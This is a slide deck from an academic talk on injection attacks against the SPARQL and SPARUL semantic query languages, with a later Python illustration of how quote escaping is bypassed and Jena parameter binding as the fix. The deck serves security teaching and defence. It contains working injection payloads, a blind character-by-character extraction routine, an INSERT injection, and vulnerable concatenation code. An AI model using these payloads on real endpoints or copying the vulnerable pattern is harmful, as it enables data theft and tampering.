Identifying Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages
Outline:
Introduction
Vulnerable code samples
Addressing code injection
Conclusions
Addressing Security Issues in the Semantic Web: Injection attacks in the Semantic Query Languages
Pablo Orduña, Aitor Almeida, Unai Aguilera, Xabier Laiseca, Diego López-de-Ipiña, Aitor Gómez-Goiri
September 9th, 2010
Future Internet - collaborative strategic research programme (Elkarlaneko ikerkuntza estrategikorako programa); ETORTEK 2008
P. Orduña, A. Almeida, U. Aguilera, X. Laiseca, D. López-de... Addressing Security Issues in the Semantic Web: Injection att...
Introduction
The Semantic Web is based on a set of technologies:
XML
RDF
OWL
...
Query Languages
New technologies have been developed to query the ontologies
RDQL → (later) SPARQL → (later) SPARUL
These new query languages are based on SQL
RDQL and SPARQL → read-only query languages
SPARUL (SPARQL/Update) → introduces modification capabilities
SPARQL sample:
PREFIX injection: <http://www.morelab.deusto.es/injection.owl#>
SELECT ?p1
WHERE {
  ?p1 a injection:Person .
}
Security issues
The use of these new query languages introduces vulnerabilities already known from the misuse of older query languages
Attacks like SQL Injection, LDAP Injection or even XPath Injection are already well known
Libraries provide tools to sanitize user input in these languages
A proper usage of the query languages is required in order to face new techniques, including:
(Blind) SPARQL Injection
SPARUL Injection
SPARQL Injection
Introducing SPARQL Injection
The following query is assumed to retrieve the friends of a user whose fullName is provided by the variable name
The ontology is available at http://www.morelab.deusto.es/injection.owl
SPARQL Injection
Introducing SPARQL Injection
This code can be exploited to retrieve any information in the ontology
The problem is that the variable name has not been sanitized
This variable can include SPARQL code, and thus modify the query itself
A variable with malicious content can be found in the next slide
Appending the Strings
// The user-supplied value. On the slide it is shown after the query; it is declared
// first here so the snippet compiles. This is the malicious input discussed above.
String name = "Pablo Orduna' . " +
              "?b1 a injection:Building . " +
              "?b1 injection:name ?name1 . " +
              "} #";
// Vulnerable: the value is concatenated straight into the SPARQL query text
String queryString =
    "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +
    "SELECT ?name1 ?name2 WHERE {" +
    " ?p1 a injection:Person . " +
    " ?p2 a injection:Person . " +
    " ?p1 injection:fullName '" + name + "' . " +
    " ?p1 injection:isFriendOf ?p2 . " +
    " ?p1 injection:fullName ?name1 . " +
    " ?p2 injection:fullName ?name2 . " +
    "}";
The final query
String queryString =
    "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +
    "SELECT ?name1 ?name2 WHERE {" +
    " ?p1 a injection:Person . " +
    " ?p2 a injection:Person . " +
    " ?p1 injection:fullName 'Pablo Orduna' . " +
    " ?b1 a injection:Building . " +
    " ?b1 injection:name ?name1 . " +
    " } #" + /* From this point everything is commented and thus ignored */ "' . " +
    " ?p1 injection:isFriendOf ?p2 . " +
    " ?p1 injection:fullName ?name1 . " +
    " ?p2 injection:fullName ?name2 . " +
    "}";
SPARQL Injection
This code will return the name of the building instead of the name of a user
It is possible to use the flexibility of SPARQL to perform other kinds of queries retrieving any information in the ontology
Blind SPARQL Injection
Introducing Blind SPARQL Injection
The previous sample was especially vulnerable since it returned a string
It is possible to retrieve any information as a string
Strings are usually not retrieved in SPARQL, but individuals
What if the returned value is an individual?
It's still possible to retrieve any information
If it's possible to know whether a given query is true or false, it's possible to iteratively retrieve any information
The following code retrieves the individuals themselves
It's possible to know whether or not the query returned the individuals
Blind SPARQL Injection
Once again, the variable name has not been sanitized
So it's still possible to inject SPARQL code
The injected code can't return a building or the building name
But, adding a condition like "does the building name start with this letter", we will get:
The usual results → the building name starts with that letter
No results → the building name does not start with that letter
The final query would be. . .
// s holds the prefix being tested (see the recursive routine on the next slide)
"PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> " +
"PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> " +
"SELECT ?p1 ?p2 WHERE {" +
" ?p1 a injection:Person . " +
" ?p2 a injection:Person . " +
" ?p1 injection:fullName 'Pablo Orduna' . " +
" ?b1 a injection:Building . " +
" ?b1 injection:name ?buildingName . " +
" FILTER regex(?buildingName, \"^" + s + ".*\") . " +
" } #" + /* from here ignored */ "'^^xsd:string . " +
" ?p1 injection:isFriendOf ?p2 . }";
Querying recursively. . .
// POSSIBLE_LETTERS is the charset tried at each position; tryBlind(prefix) runs the
// query of the previous slide with s = prefix and reports whether any result came back
public static String recursively(String letters) throws Exception {
    for (int i = 0; i < POSSIBLE_LETTERS.length(); ++i) {
        char c = POSSIBLE_LETTERS.charAt(i);
        if (tryBlind(letters + c)) {
            System.out.println(c);
            return "" + c + recursively(letters + c);
        }
    }
    return "";
}
Blind SPARQL Injection
It is possible to optimize this system using binary search
Performing queries using regular expressions like ^[A-M].* to know whether the char is between A and M
Given a charset of length 64, we would reduce the number of iterations from 64 times 10 (640) to 6 times 10 (60)
Using the whole UTF-16 charset, it would reduce the number of iterations from 65536 times 10 (655360) to 16 times 10 (160)
The point is that it's possible to retrieve any information in the ontology independently of the values returned by the query
SPARUL Injection
Introducing SPARQL/Update Injection
All the previous examples are executed in read-only query languages
SPARUL introduces the chance to modify the ontology
INSERT, MODIFY and DELETE statements are available
The following sample modifies the fullName of the resource injection:Pablo, setting it to the value of the variable name
SPARUL Injection
// The value closes the application's own update statement, appends an INSERT of its own,
// and comments out whatever the application concatenates afterwards
String name = "Pablo Ordunya'^^xsd:string" +
              "} \n " +
              "INSERT {" +
              " injection:Pablo injection:isFriendOf injection:EvilMonkey" +
              "} #"; // }:-D
String result = sample.run(name);
With this vulnerability, it is possible to modify the whole ontology.
Addressing code injection
Mechanisms provided by the library must be used (if provided)
Not as simple as escaping the ' characters: the string \u0027 is a single quote, just as in Java
System.out.println("a\u0022.length() + \u0022b".length());
// This code prints "2", the result of ("a".length() + "b".length()),
// since \u0022 is replaced by " before compilation, even inside a comment or a String
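As an added illustration of this slide's point (example code written for this page, not the authors' code): the check below models the SPARQL 1.0 rule that \uXXXX codepoint escapes are translated before parsing, shows why replacing ' with \' is not enough, and contrasts it with an encoder that refuses backslashes. The query template and the payload come from slide 8; the \u0027 variant, the function names and the literal scanner are constructed for this example.

```python
import re

# Friends query from slide 8, with the user value spliced into the fullName literal.
TEMPLATE = (
    "PREFIX injection: <http://www.morelab.deusto.es/injection.owl#> "
    "SELECT ?name1 ?name2 WHERE { ?p1 a injection:Person . ?p2 a injection:Person . "
    "?p1 injection:fullName '__NAME__' . ?p1 injection:isFriendOf ?p2 . "
    "?p1 injection:fullName ?name1 . ?p2 injection:fullName ?name2 . }"
)
LITERAL_OPEN = "injection:fullName '"
EXPECTED_TAIL = TEMPLATE.split("'__NAME__'", 1)[1]

# Payload from slide 8, and a constructed variant that spells the quote as \u0027.
SLIDE_PAYLOAD = "Pablo Orduna' . ?b1 a injection:Building . ?b1 injection:name ?name1 . } #"
UNICODE_PAYLOAD = SLIDE_PAYLOAD.replace("'", "\\u0027")

CODEPOINT_ESCAPE = re.compile(r"\\u([0-9A-Fa-f]{4})|\\U([0-9A-Fa-f]{8})")
ECHAR = {"t": "\t", "b": "\b", "n": "\n", "r": "\r", "f": "\f", "\\": "\\", '"': '"', "'": "'"}


def preprocess_codepoint_escapes(query: str) -> str:
    """Model of the rule the slide relies on: \\uXXXX / \\UXXXXXXXX are translated into
    code points before the query is parsed, exactly as javac does for Java source."""
    return CODEPOINT_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), query)


def split_at_literal(query: str):
    """Scan the fullName literal the way a SPARQL lexer would (a backslash escapes the next
    char, an unescaped quote closes the literal); return (literal_value, text_after_literal)."""
    i = query.index(LITERAL_OPEN) + len(LITERAL_OPEN)
    out = []
    while i < len(query):
        ch = query[i]
        if ch == "\\" and i + 1 < len(query):
            out.append(ECHAR.get(query[i + 1], query[i + 1]))
            i += 2
            continue
        if ch == "'":
            return "".join(out), query[i + 1:]
        out.append(ch)
        i += 1
    raise ValueError("unterminated string literal")


def naive_escape(value: str) -> str:
    """The 'just escape the quotes' approach the slide warns against."""
    return value.replace("'", "\\'")


def encode_literal(value: str) -> str:
    """Defensive encoder for the cases where a literal really must be spliced into query text:
    refuse backslashes outright (a backslash is what lets \\u0027 smuggle a quote past any
    quote-escaper), then escape what STRING_LITERAL1 cannot contain raw. Parameter binding
    (Jena's initialBinding on the next slide) remains the preferred fix."""
    if "\\" in value:
        raise ValueError("backslash not allowed in a user-supplied literal")
    return value.replace("'", "\\'").replace("\n", "\\n").replace("\r", "\\r")


def accepted_by_encoder(value: str) -> bool:
    try:
        encode_literal(value)
        return True
    except ValueError:
        return False


def assembled_literal(value: str, encoder):
    """Build the query with the given encoder, apply codepoint-escape preprocessing, and report
    (structure_intact, literal_the_engine_sees). structure_intact is False whenever the value
    broke out of the literal, i.e. the text after the literal is no longer the template's tail."""
    query = preprocess_codepoint_escapes(TEMPLATE.replace("__NAME__", encoder(value)))
    literal, rest = split_at_literal(query)
    return rest == EXPECTED_TAIL, literal


if __name__ == "__main__":
    for label, value, enc in [
        ("benign, naive escape", "Pablo Orduna", naive_escape),
        ("slide 8 payload, no escaping", SLIDE_PAYLOAD, lambda v: v),
        ("slide 8 payload, naive escape", SLIDE_PAYLOAD, naive_escape),
        ("\\u0027 payload, naive escape", UNICODE_PAYLOAD, naive_escape),
    ]:
        intact, literal = assembled_literal(value, enc)
        print(f"{label}: intact={intact} literal={literal!r}")
    print("\\u0027 payload accepted by encode_literal:", accepted_by_encoder(UNICODE_PAYLOAD))
```

The naive escaper stops the plain payload but not the \u0027 spelling, which is why the slide insists on the library's own binding mechanism rather than home-grown quoting.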
Frameworks
In Jena, the initialBinding argument can be used in the QueryExecutionFactory
// Jena 2.x packages (current Apache Jena uses org.apache.jena.query / org.apache.jena.rdf.model)
import com.hp.hpl.jena.query.*;
import com.hp.hpl.jena.rdf.model.Model;
import com.hp.hpl.jena.rdf.model.RDFNode;
// model holds the ontology, name is the user-supplied value; queryString refers to it only
// as the variable ?thename (e.g. " ?p1 injection:fullName ?thename . "), so the value is
// bound by the engine and never spliced into the query text
QuerySolutionMap initialBinding = new QuerySolutionMap();
RDFNode parameterizedName = model.createLiteral(name);
initialBinding.add("thename", parameterizedName); // the slide wrote initialSetting, which is never declared
// Perform the query
Query query = QueryFactory.create(queryString);
QueryExecution qe = QueryExecutionFactory.create(query, model, initialBinding);
ResultSet results = qe.execSelect();
Conclusions
Not sanitizing the user input might add a set of security vulnerabilities to our systems
In the paper it is presented how new query languages inherit security issues present in older query languages, and therefore these should also be taken into account when working with them
Questions?
DeustoTech - Internet
http://www.morelab.deusto.es
Pablo Orduña pablo.orduna@deusto.es
Aitor Almeida aitor.almeida@deusto.es
Unai Aguilera unai.aguilera@deusto.es
Xabier Laiseca xabier.laiseca@deusto.es
Diego López-de-Ipiña dipina@deusto.es
Aitor Gómez-Goiri aitor.gomez@deusto.es